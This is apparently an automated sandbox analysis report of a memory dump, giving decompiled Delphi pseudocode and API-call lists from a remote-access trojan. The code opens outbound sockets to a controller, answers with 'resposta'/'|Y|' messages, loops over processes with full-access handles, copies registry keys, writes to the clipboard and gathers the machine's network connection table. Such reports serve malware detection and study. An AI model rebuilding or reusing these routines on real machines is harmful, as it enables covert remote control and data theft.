                                    					if(__eflags > 0) {
                                    						goto L10;
                                    					}
                                    				} else {
                                    					_t121 = _a8;
                                    					if(_a8 > 0) {
                                    						L10:
                                    						E24011428(E24012020( &_v352, _a8));
                                    						L12:
                                    						if(E24011428(E24011C00( &_v352, _t121)) != 0 ||  *((char*)(_v20 + 0x10)) == 0) {
                                    							_t67 = 0;
                                    						} else {
                                    							_t67 = 1;
                                    						}
                                    						if(_t67 == 1) {
                                    							goto L11;
                                    						}
                                    						_pop(_t107);
                                    						 *[fs:eax] = _t107;
                                    						_push(0x2403afb4);
                                    						return E24011428(E24011B50( &_v352));
                                    						L11:
                                    						Sleep(1);
                                    						E24011428(E24011B10( &_v16));
                                    						E24022CEC(_v20, _v16,  &_v33121);
                                    					}
                                    				}
                                    				goto L12;
                                    			}

                                    [Instruction address column for the listing above (decompiler line-to-address map, flattened by extraction): 94 entries, first 0x2403adc0, last 0x00000000]

                                    APIs
                                    • Sleep.KERNEL32(000003E8,2403B060,?,?,?,?,2403B060,2405B98C,2403B060,resposta,|Y|,2405B8DC,00000000,2403B027), ref: 2403AECC
                                      • Part of subcall function 24022B24: getpeername.WS2_32(?,?), ref: 24022B3B
                                      • Part of subcall function 24022B24: inet_ntoa.WS2_32(?), ref: 24022B44
                                      • Part of subcall function 24022B58: getpeername.WS2_32(?,?), ref: 24022B6C
                                      • Part of subcall function 24022B58: htons.WS2_32(?), ref: 24022B77
                                      • Part of subcall function 24022908: socket.WS2_32(00000002,00000001,00000006), ref: 24022959
                                      • Part of subcall function 24022908: htons.WS2_32(?), ref: 24022968
                                      • Part of subcall function 24022908: inet_addr.WS2_32(00000000), ref: 24022975
                                      • Part of subcall function 24022908: gethostbyname.WS2_32(00000000), ref: 240229A2
                                      • Part of subcall function 24022908: connect.WS2_32(00000002,00000002,00000010), ref: 240229CD
                                    • Sleep.KERNEL32(0000000A,00000000,2403B027), ref: 2403AE54
                                    • Sleep.KERNEL32(00000001,00000000,2403AFAD,?,000003E8,2403B060,?,?,?,?,2403B060,2405B98C,2403B060,resposta,|Y|,2405B8DC), ref: 2403AF33
                                      • Part of subcall function 24022CEC: send.WSOCK32(?,00000000,00000000,00000000,00000000,?,24022D4C,?,?,24038FD9,24039060,24039054,?,00000000,?,00000000), ref: 24022CF8
                                      • Part of subcall function 24022CEC: WSAGetLastError.WS2_32(?,00000000,00000000,00000000,00000000,?,24022D4C,?,?,24038FD9,24039060,24039054,?,00000000,?,00000000), ref: 24022D04
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$getpeernamehtons$ErrorLastconnectgethostbynameinet_addrinet_ntoasendsocket
                                    • String ID: resposta$|Y|
                                    • API String ID: 3039588340-3743483372
                                    • Opcode ID: 51112f6189846ce56c8f689ac25b3f33adf8a00fa7b829192b95b24f2d56059a
                                    • Instruction ID: bea7750fd3e4f4aa172b81ee9d62e3105a374173d7c41863c6d3f5e7b91c26ec
                                    • Opcode Fuzzy Hash: 51112f6189846ce56c8f689ac25b3f33adf8a00fa7b829192b95b24f2d56059a
                                    • Instruction Fuzzy Hash: 44515C70A002189FEB12DF95DC80A8EBFF9FF59308F5084A5F448AA254DB349ED59F51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 60%
                                    			E24022908(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				intOrPtr _v20;
                                    				short _v22;
                                    				char _v24;
                                    				short _t29;
                                    				intOrPtr _t30;
                                    				intOrPtr _t34;
                                    				intOrPtr _t41;
                                    				void* _t46;
                                    				intOrPtr _t56;
                                    				intOrPtr _t57;
                                    				intOrPtr _t58;
                                    				void* _t61;
                                    				intOrPtr _t62;
                                    				void* _t64;
                                    				void* _t65;
                                    				intOrPtr _t66;
                                    				void* _t67;
                                    
                                    				_t67 = __eflags;
                                    				_t64 = _t65;
                                    				_t66 = _t65 + 0xffffffec;
                                    				_push(__edi);
                                    				_t61 = __ecx;
                                    				_v8 = __edx;
                                    				_t46 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t64);
                                    				_push(0x24022a1b);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t66;
                                    				E24022A38(_t46, _t46, 0x24022a34, __edi, __ecx, _t67);
                                    				_push(_t64);
                                    				_push(0x24022987);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t66;
                                    				_t29 = E24013534(_v8);
                                    				 *((intOrPtr*)(_t46 + 4)) = _t29;
                                    				_push(6);
                                    				_push(1);
                                    				_push(2);
                                    				L240225D0();
                                    				 *((intOrPtr*)(_t46 + 0x14)) = _t29;
                                    				_v24 = 2;
                                    				_push(_t61);
                                    				L24022588();
                                    				_v22 = _t29;
                                    				_t30 =  *((intOrPtr*)(_t46 + 4));
                                    				L24022590();
                                    				_v20 = _t30;
                                    				_t56 = _t30;
                                    				 *[fs:eax] = _t56;
                                    				if(_v20 != 0xffffffff) {
                                    					L4:
                                    					_push(_t64);
                                    					_push(0x240229de);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t66;
                                    					_push(0x10);
                                    					_push( &_v24);
                                    					_t34 =  *((intOrPtr*)(_t46 + 0x14));
                                    					L24022570();
                                    					_t62 = _t34;
                                    					_t57 = _t34;
                                    					 *[fs:eax] = _t57;
                                    					if(_t62 >= 0) {
                                    						 *(_t46 + 0x10) = 1;
                                    					} else {
                                    						 *(_t46 + 0x10) = 0;
                                    					}
                                    					 *(_t46 + 0x11) =  *(_t46 + 0x10) ^ 0x00000001;
                                    				} else {
                                    					_t41 =  *((intOrPtr*)(_t46 + 4));
                                    					_push(_t41);
                                    					L240225E0();
                                    					if(_t41 != 0) {
                                    						_v20 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0xc))))));
                                    						goto L4;
                                    					}
                                    				}
                                    				_pop(_t58);
                                    				 *[fs:eax] = _t58;
                                    				_push(0x24022a22);
                                    				return E24013088( &_v8);
                                    			}

                                    [Instruction address column for the listing above (decompiler line-to-address map, flattened by extraction): 65 entries, first 0x24022908, last 0x24022a1a]

                                    APIs
                                      • Part of subcall function 24022A38: shutdown.WS2_32(?,00000002), ref: 24022A83
                                      • Part of subcall function 24022A38: closesocket.WS2_32(?), ref: 24022AB1
                                    • socket.WS2_32(00000002,00000001,00000006), ref: 24022959
                                    • htons.WS2_32(?), ref: 24022968
                                    • inet_addr.WS2_32(00000000), ref: 24022975
                                    • gethostbyname.WS2_32(00000000), ref: 240229A2
                                    • connect.WS2_32(00000002,00000002,00000010), ref: 240229CD
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: closesocketconnectgethostbynamehtonsinet_addrshutdownsocket
                                    • String ID:
                                    • API String ID: 1626636048-0
                                    • Opcode ID: ea3ef0b9c5b1ddf9c85e1f6295dee03a8b296f79e9d950188d0a1a864e23e963
                                    • Instruction ID: 8e6301627d0eba413e0a06bb046a4c1ab87b9936023ad13f76e3c78a901c4251
                                    • Opcode Fuzzy Hash: ea3ef0b9c5b1ddf9c85e1f6295dee03a8b296f79e9d950188d0a1a864e23e963
                                    • Instruction Fuzzy Hash: 8A31E230504B54EFEB11CFA4D860A5BBBE8EF0D314B4248A9E800DF685E774DA90CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E24055DD4() {
                                    				char _v8;
                                    				char _v12;
                                    				char _v308;
                                    				void* _t28;
                                    				intOrPtr _t32;
                                    				void* _t36;
                                    				void* _t37;
                                    				void* _t38;
                                    				intOrPtr* _t44;
                                    				void* _t45;
                                    				void* _t46;
                                    				intOrPtr _t47;
                                    
                                    				_v8 = 0;
                                    				_v12 = 0;
                                    				_t44 =  &_v308;
                                    				_push(_t46);
                                    				_push(0x24055eb7);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t47;
                                    				while(1) {
                                    					E24013120( &_v8, _v12);
                                    					E24013088( &_v12);
                                    					_t45 = E240157E0(0xf, 0);
                                    					 *_t44 = 0x128;
                                    					E24015800(_t45, _t44);
                                    					do {
                                    						_t36 = OpenProcess(0x1f0fff, 0,  *(_t44 + 8));
                                    						if(_t36 != 0) {
                                    							_t28 = E24055CF4( *(_t44 + 8), _t36, _t37, _t46);
                                    							_pop(_t38);
                                    							if(_t28 == 0 && GetCurrentProcessId() !=  *(_t44 + 8)) {
                                    								_t32 =  *0x2405ab6c; // 0x2405b968
                                    								E240547C8(_t36, _t36, _t38, E24013588(_t32), _t44, _t45);
                                    							}
                                    							E24055D68( *(_t44 + 8), _t36, _t46);
                                    							_pop(_t37);
                                    						}
                                    						CloseHandle(_t36);
                                    					} while (E24015820(_t45, _t44) != 0);
                                    					CloseHandle(_t45);
                                    					Sleep(0x64);
                                    				}
                                    			}

                                    APIs
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,24055EB7), ref: 24055E37
                                    • GetCurrentProcessId.KERNEL32(001F0FFF,00000000,?,00000000,24055EB7), ref: 24055E50
                                    • CloseHandle.KERNEL32(00000000,001F0FFF,00000000,?,00000000,24055EB7), ref: 24055E78
                                    • CloseHandle.KERNEL32(00000000,00000000,001F0FFF,00000000,?,00000000,24055EB7), ref: 24055E8B
                                    • Sleep.KERNEL32(00000064,00000000,00000000,001F0FFF,00000000,?,00000000,24055EB7), ref: 24055E92
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcess$CurrentOpenSleep
                                    • String ID:
                                    • API String ID: 4261582699-0
                                    • Opcode ID: 9929b0032c801469f5b6af0c31c36f4a8a7653f2113dd8b91e2817a621e74f76
                                    • Instruction ID: c4089e7b3f87a5e07cdd465348963ce968e967bd053b07ea7c575cf46cb06823
                                    • Opcode Fuzzy Hash: 9929b0032c801469f5b6af0c31c36f4a8a7653f2113dd8b91e2817a621e74f76
                                    • Instruction Fuzzy Hash: C911B2306006056BF7019B69DC80A4FBBEDEF65604F500570A808E7669EF70AEC286A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 35%
                                    			E24037D20() {
                                    				char _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _t31;
                                    				void* _t34;
                                    				void* _t35;
                                    				intOrPtr _t37;
                                    				void* _t38;
                                    
                                    				_push(0);
                                    				_push(0);
                                    				_push(_t35);
                                    				_push(_t34);
                                    				_push(0x24037e17);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t37;
                                    				E24013120( &_v8,  *0x2405ca48);
                                    				E24013088(0x2405ca48);
                                    				E24022908(_t12, E24012658(1),  *0x2405ca3c,  *0x2405ca38, _t34, _t35, _t38);
                                    				Sleep(0xa);
                                    				_t39 = _v8;
                                    				if(_v8 != 0) {
                                    					_push( *0x2405ca40);
                                    					_push("|Y|");
                                    					_push("resposta");
                                    					_push(0x24037e50);
                                    					_push( *0x2405ca34);
                                    					_push(0x24037e50);
                                    					_push(_v8);
                                    					E240133FC();
                                    					E24038F28(_t23, _t23, _v12, _t34, _t35, _t39);
                                    				}
                                    				Sleep(0x3e8);
                                    				_push(_t36);
                                    				_push(0x24037de6);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t37;
                                    				E24022A38(_t23, _t23, 0x24037e5c, _t34, _t35, _t39);
                                    				_pop(_t31);
                                    				 *[fs:eax] = _t31;
                                    				L3:
                                    				Sleep(0xea60);
                                    				goto L3;
                                    			}

                                    APIs
                                      • Part of subcall function 24022908: socket.WS2_32(00000002,00000001,00000006), ref: 24022959
                                      • Part of subcall function 24022908: htons.WS2_32(?), ref: 24022968
                                      • Part of subcall function 24022908: inet_addr.WS2_32(00000000), ref: 24022975
                                      • Part of subcall function 24022908: gethostbyname.WS2_32(00000000), ref: 240229A2
                                      • Part of subcall function 24022908: connect.WS2_32(00000002,00000002,00000010), ref: 240229CD
                                    • Sleep.KERNEL32(0000000A,00000000,24037E17,?,?,?,?,00000000,00000000), ref: 24037D73
                                    • Sleep.KERNEL32(000003E8,0000000A,00000000,24037E17,?,?,?,?,00000000,00000000), ref: 24037DBD
                                    • Sleep.KERNEL32(0000EA60,000003E8,0000000A,00000000,24037E17,?,?,?,?,00000000,00000000), ref: 24037DF5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$connectgethostbynamehtonsinet_addrsocket
                                    • String ID: resposta$|Y|
                                    • API String ID: 1101491793-3743483372
                                    • Opcode ID: e29a52bf325f5ec422a2037ef2ca2f2cfac8facc2424b06c65ecf119012e470c
                                    • Instruction ID: 46af02bde1e37943a9351d421e33d8f687e8ddacd249fb51c4fc2043ee63e6e1
                                    • Opcode Fuzzy Hash: e29a52bf325f5ec422a2037ef2ca2f2cfac8facc2424b06c65ecf119012e470c
                                    • Instruction Fuzzy Hash: 5C119030304648BBEB029BA9DCA0F1E7FA9E75D60CF608465F904A7698C578BEC09A51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 71%
                                    			E2402BFE4(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				long _t30;
                                    				void* _t39;
                                    				intOrPtr _t44;
                                    				char* _t49;
                                    				void* _t52;
                                    
                                    				_v12 = __ecx;
                                    				_v8 = __edx;
                                    				_t39 = __eax;
                                    				E24013524(_v8);
                                    				E24013524(_v12);
                                    				_push(_t52);
                                    				_push(0x2402c081);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t52 + 0xfffffff0;
                                    				_t49 = E24013534(_v8);
                                    				if(RegOpenKeyA(_t39, _t49,  &_v16) == 0) {
                                    					_t30 = RegCreateKeyA(_t39, E24013534(_v12),  &_v20);
                                    					_t56 = _t30;
                                    					if(_t30 == 0) {
                                    						E2402BDD4(_v16, _t39, _v20, __edi, _t49, _t56);
                                    					}
                                    					RegCloseKey(_v16);
                                    					RegCloseKey(_v20);
                                    					RegDeleteKeyA(_t39, _t49);
                                    				}
                                    				_pop(_t44);
                                    				 *[fs:eax] = _t44;
                                    				_push(0x2402c088);
                                    				return E240130AC( &_v12, 2);
                                    			}

                                    APIs
                                    • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 2402C022
                                    • RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 2402C039
                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00000000,2402C081), ref: 2402C051
                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,2402C081), ref: 2402C05A
                                    • RegDeleteKeyA.ADVAPI32(?,00000000), ref: 2402C061
                                      • Part of subcall function 2402BDD4: RegEnumValueA.ADVAPI32(?,00000000,00000000,00000200,00000000,?,?,00002000,00000000,2402BF43,?,00000000,2402BF60), ref: 2402BE4E
                                      • Part of subcall function 2402BDD4: RegSetValueExA.ADVAPI32(?,00000000,00000000,?,?,00002000,?,00000000,00000000,00000200,00000000,?,?,00002000,00000000,2402BF43), ref: 2402BE74
                                      • Part of subcall function 2402BDD4: RegDeleteValueA.ADVAPI32(?,00000000,?,00000000,00000000,?,?,00002000,?,00000000,00000000,00000200,00000000,?,?,00002000), ref: 2402BE85
                                      • Part of subcall function 2402BDD4: RegEnumKeyExA.ADVAPI32(?,00000000,00000000,00000200,00000000,?,00002000,00000000,?,00000000,00000000,00000200,00000000,?,?,00002000), ref: 2402BEB9
                                      • Part of subcall function 2402BDD4: RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 2402BED5
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Value$CloseCreateDeleteEnum$Open
                                    • String ID:
                                    • API String ID: 3917402359-0
                                    • Opcode ID: 3847444bdcd780156d4e614cf2cc65c7fa208097f743836a4498f3d3338719a9
                                    • Instruction ID: 834d3c274e24900812e860d865bb6421dec51c6eacfb8db9c79b4ce291afdb1d
                                    • Opcode Fuzzy Hash: 3847444bdcd780156d4e614cf2cc65c7fa208097f743836a4498f3d3338719a9
                                    • Instruction Fuzzy Hash: 9A115EB1904608AFEB11DBB4DDC0EAFBBFCEF18244B504560B408E3254E634AE808A20
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 45%
                                    			E2403CFC8(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                    				void* _v8;
                                    				void* __ecx;
                                    				intOrPtr _t29;
                                    				void* _t33;
                                    				intOrPtr _t35;
                                    				intOrPtr _t36;
                                    
                                    				_t35 = _t36;
                                    				_t33 = __eax;
                                    				_t23 = E2401333C(__eax);
                                    				OpenClipboard(0);
                                    				_push(_t35);
                                    				_push(0x2403d092);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t36;
                                    				_v8 = GlobalAlloc(0x2002, _t7);
                                    				_push(_t35);
                                    				_push(0x2403d067);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t36;
                                    				_t12 = _v8;
                                    				GlobalFix(_v8);
                                    				_push(_t35);
                                    				_push(0x2403d056);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t36;
                                    				E24011494(E24013534(_t33), _t23, _t12);
                                    				SetClipboardData(1, _v8);
                                    				_pop(_t29);
                                    				 *[fs:eax] = _t29;
                                    				_push(0x2403d05d);
                                    				return GlobalUnWire(_v8);
                                    			}

                                    APIs
                                    • OpenClipboard.USER32(00000000), ref: 2403CFDC
                                    • GlobalAlloc.KERNEL32(00002002,00000000,00000000,2403D092,?,00000000), ref: 2403CFF5
                                    • GlobalFix.KERNEL32(?), ref: 2403D00F
                                    • SetClipboardData.USER32(00000001,?), ref: 2403D03A
                                    • GlobalUnWire.KERNEL32(?), ref: 2403D050
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Global$Clipboard$AllocDataOpenWire
                                    • String ID:
                                    • API String ID: 3185678922-0
                                    • Opcode ID: 2e6b4804b7f4240e95b2f524206a62390b914c6f8c95fe742b134c5cd911f968
                                    • Instruction ID: 98f45dbb81f7d453bc78d2fc35bb422784256c696a16146a8a119f9aafd29b36
                                    • Opcode Fuzzy Hash: 2e6b4804b7f4240e95b2f524206a62390b914c6f8c95fe742b134c5cd911f968
                                    • Instruction Fuzzy Hash: AA01B171600644BFFB129FB59C71E2EBEADDB5EA44F820860F908C7604D5759E51C960
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 56%
                                    			E2402E4F8(char __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                    				char _v5;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				void _v72;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				intOrPtr _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				char _v100;
                                    				char _v104;
                                    				char _v108;
                                    				char _v112;
                                    				char _v116;
                                    				char _v120;
                                    				char _v124;
                                    				char _v128;
                                    				char _v132;
                                    				char _v136;
                                    				char _v140;
                                    				char _v144;
                                    				signed int _t159;
                                    				intOrPtr _t236;
                                    				intOrPtr _t237;
                                    				void* _t238;
                                    				void* _t239;
                                    				void* _t240;
                                    				intOrPtr _t254;
                                    				intOrPtr _t260;
                                    				signed int _t289;
                                    				signed int _t290;
                                    				void* _t294;
                                    				intOrPtr* _t296;
                                    				intOrPtr _t299;
                                    				intOrPtr _t300;
                                    
                                    				_t299 = _t300;
                                    				_t240 = 0x11;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t240 = _t240 - 1;
                                    				} while (_t240 != 0);
                                    				_push(_t240);
                                    				_t296 = __edx;
                                    				_v5 = __eax;
                                    				_push(_t299);
                                    				_push(0x2402e8b6);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t300;
                                    				E240158BC( &_v88, _t240, 0, GetCurrentProcessId(), 0);
                                    				E24013388(_t296, 0x2402e8d0, _v88);
                                    				_t236 =  *((intOrPtr*)( *0x2405c9ac));
                                    				if(_t236 >= 0) {
                                    					_t239 = _t236 + 1;
                                    					_t290 = 0;
                                    					do {
                                    						memcpy( &_v72,  *0x2405c9ac + 4 + (_t290 + _t290 * 2) * 8, 6 << 2);
                                    						_t300 = _t300 + 0xc;
                                    						_t294 = _t290;
                                    						_t296 = _t296;
                                    						E24013120( &_v12, 0x2402e8dc);
                                    						_t304 = _v5;
                                    						if(_v5 != 0) {
                                    							E2402E040(_v68, _t239,  &_v100, __eflags);
                                    							E24013304( &_v96, _v100);
                                    							E2402DD70(_v96, 0,  &_v16, __eflags);
                                    						} else {
                                    							E2402E040(_v68, _t239,  &_v92, _t304);
                                    							E24013304( &_v16, _v92);
                                    						}
                                    						_v24 = E2402E11C(_v64);
                                    						_t305 = _v5;
                                    						if(_v5 != 0) {
                                    							E2402E040(_v60, _t239,  &_v112, __eflags);
                                    							E24013304( &_v108, _v112);
                                    							E2402DD70(_v108, 0,  &_v20, __eflags);
                                    						} else {
                                    							E2402E040(_v60, _t239,  &_v104, _t305);
                                    							E24013304( &_v20, _v104);
                                    						}
                                    						_v28 = E2402E11C(_v56);
                                    						_t250 =  &_v40;
                                    						E2402E448(_v52, _t239,  &_v40, "Unknown", _t294, _t296, _t305);
                                    						_v48 = _v52;
                                    						if(_v72 == 0 || _v72 > 0xc) {
                                    							_t281 = 0x2402e8f8;
                                    							E24013120( &_v44, 0x2402e8f8);
                                    						} else {
                                    							_t281 =  *((intOrPtr*)(0x240572c8 + _v72 * 4));
                                    							E24013120( &_v44,  *((intOrPtr*)(0x240572c8 + _v72 * 4)));
                                    						}
                                    						_push( *_t296);
                                    						_push(_v12);
                                    						_push(0x2402e8d0);
                                    						_push(_v16);
                                    						_push(0x2402e8d0);
                                    						asm("cdq");
                                    						E240158BC( &_v116, _t250, _t281, _v24, _t281);
                                    						_push(_v116);
                                    						_push(0x2402e8d0);
                                    						_push(_v20);
                                    						_push(0x2402e8d0);
                                    						asm("cdq");
                                    						E240158BC( &_v120, _t250, _t281, _v28, _t281);
                                    						_push(_v120);
                                    						_push(0x2402e8d0);
                                    						_push(_v44);
                                    						_push(0x2402e8d0);
                                    						asm("cdq");
                                    						// Partial listing: tail of a connection-listing routine (string set "TCP", "UDP", "Unknown";
                                    						// subcall E2402DD70 does a reverse lookup with inet_addr/gethostbyaddr). The first table's loop ends here.
                                    						E240158BC( &_v124, _t250, _t281, _v48, _t281);
                                    						_push(_v124);
                                    						_push(0x2402e8d0);            // 0x2402e8d0 is pushed between every field: a field-separator constant
                                    						_push(_v40);
                                    						_push(0x2402e8d0);
                                    						_push(0x2402e904);            // pushed last in every record: a record-terminator constant
                                    						E240133FC();                  // Delphi string concatenation of the pushed parts onto the result
                                    						_t290 = _t294 + 1;
                                    						_t239 = _t239 - 1;
                                    					} while (_t239 != 0);
                                    				}
                                    				// Second table: count-prefixed array at *0x2405c9b0, 12 bytes (three DWORDs) per entry.
                                    				_t237 =  *((intOrPtr*)( *0x2405c9b0));   // entry count
                                    				if(_t237 >= 0) {
                                    					_t238 = _t237 + 1;
                                    					_t289 = 0;
                                    					do {
                                    						_t159 = _t289 + _t289 * 2;    // index * 3 (DWORD units)
                                    						_t260 =  *0x2405c9b0;
                                    						_v84 =  *((intOrPtr*)(_t260 + 4 + _t159 * 4));    // field 1: converted by E2402E040 and optionally resolved to a hostname, i.e. an address
                                    						_v80 =  *((intOrPtr*)(_t260 + 8 + _t159 * 4));    // field 2: converted by E2402E11C
                                    						_t246 =  *((intOrPtr*)(_t260 + 0xc + _t159 * 4));
                                    						_v76 =  *((intOrPtr*)(_t260 + 0xc + _t159 * 4));  // field 3: mapped to a name by E2402E448, "Unknown" if unmapped
                                    						E24013120( &_v12, 0x2402e910);   // per-table label constant (the function's strings are "TCP", "UDP", "Unknown"; which one sits at 0x2402e910 is not visible here)
                                    						_t311 = _v5;
                                    						if(_v5 != 0) {                   // _v5: resolve-hostnames flag
                                    							E2402E040(_v84, _t238,  &_v136, __eflags);
                                    							E24013304( &_v132, _v136);
                                    							E2402DD70(_v132, _t246,  &_v16, __eflags);   // WSAStartup -> inet_addr -> gethostbyaddr -> WSACleanup
                                    						} else {
                                    							E2402E040(_v84, _t238,  &_v128, _t311);
                                    							E24013304( &_v16, _v128);
                                    						}
                                    						_v24 = E2402E11C(_v80);
                                    						E24013120( &_v32, 0x2402e91c);   // two locals set to the same constant 0x2402e91c
                                    						E24013120( &_v36, 0x2402e91c);
                                    						E2402E448(_v76, _t238,  &_v40, "Unknown", _t289, _t296, _t311);
                                    						_v48 = _v76;
                                    						E24013120( &_v44, 0x2402e8f8);
                                    						_push( *_t296);                  // current result string
                                    						_push(_v12);                     // label
                                    						_push(0x2402e8d0);
                                    						_push(_v16);                     // address, or resolved hostname
                                    						_push(0x2402e8d0);
                                    						asm("cdq");                      // sign-extends the integer before E240158BC formats it
                                    						E240158BC( &_v140,  &_v40, 0x2402e8f8, _v24, 0x2402e8f8);
                                    						_push(_v140);                    // formatted field 2
                                    						_push(0x2402e8d0);
                                    						_push(_v32);
                                    						_push(0x2402e8d0);
                                    						_push(_v36);
                                    						_push(0x2402e8d0);
                                    						_push(_v44);
                                    						_push(0x2402e8d0);
                                    						asm("cdq");
                                    						E240158BC( &_v144,  &_v40, 0x2402e8f8, _v48, 0x2402e8f8);
                                    						_push(_v144);                    // formatted raw field 3
                                    						_push(0x2402e8d0);
                                    						_push(_v40);                     // field-3 name
                                    						_push(0x2402e8d0);
                                    						_push(0x2402e904);               // record terminator
                                    						E240133FC();                     // append the record
                                    						_t289 = _t289 + 1;
                                    						_t238 = _t238 - 1;
                                    					} while (_t238 != 0);
                                    				}
                                    				_pop(_t254);
                                    				 *[fs:eax] = _t254;                  // restore the SEH chain: end of the Delphi try/finally
                                    				_push(0x2402e8c0);
                                    				E240130AC( &_v144, 2);               // finalize string locals; E24013778/E24013790 free wide strings via SysFreeString
                                    				E24013778( &_v136);
                                    				E24013088( &_v132);
                                    				E24013778( &_v128);
                                    				E240130AC( &_v124, 3);
                                    				E24013778( &_v112);
                                    				E24013088( &_v108);
                                    				E24013790( &_v104, 2);
                                    				E24013088( &_v96);
                                    				E24013778( &_v92);
                                    				E24013088( &_v88);
                                    				E240130AC( &_v44, 4);
                                    				return E240130AC( &_v20, 3);
                                    			}
                                    • Instruction addresses (the report's per-statement side column): 0x2402e4f9 .. 0x2402e8b5

                                    APIs
                                    • GetCurrentProcessId.KERNEL32(00000000,2402E8B6,?,?,?,?,00000010,00000000,00000000), ref: 2402E51E
                                      • Part of subcall function 2402DD70: WSAStartup.WS2_32(00000101,?), ref: 2402DDB0
                                      • Part of subcall function 2402DD70: inet_addr.WS2_32(00000000), ref: 2402DDCF
                                      • Part of subcall function 2402DD70: WSACleanup.WS2_32 ref: 2402DDDD
                                      • Part of subcall function 2402DD70: gethostbyaddr.WS2_32(000000FF,00000004,00000002), ref: 2402DDF1
                                      • Part of subcall function 2402DD70: WSACleanup.WS2_32 ref: 2402DE12
                                      • Part of subcall function 24013790: SysFreeString.OLEAUT32(?), ref: 240137A3
                                      • Part of subcall function 24013778: SysFreeString.OLEAUT32(?), ref: 24013786
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CleanupFreeString$CurrentProcessStartupgethostbyaddrinet_addr
                                    • String ID: TCP$UDP$Unknown
                                    • API String ID: 3668935989-2456960297
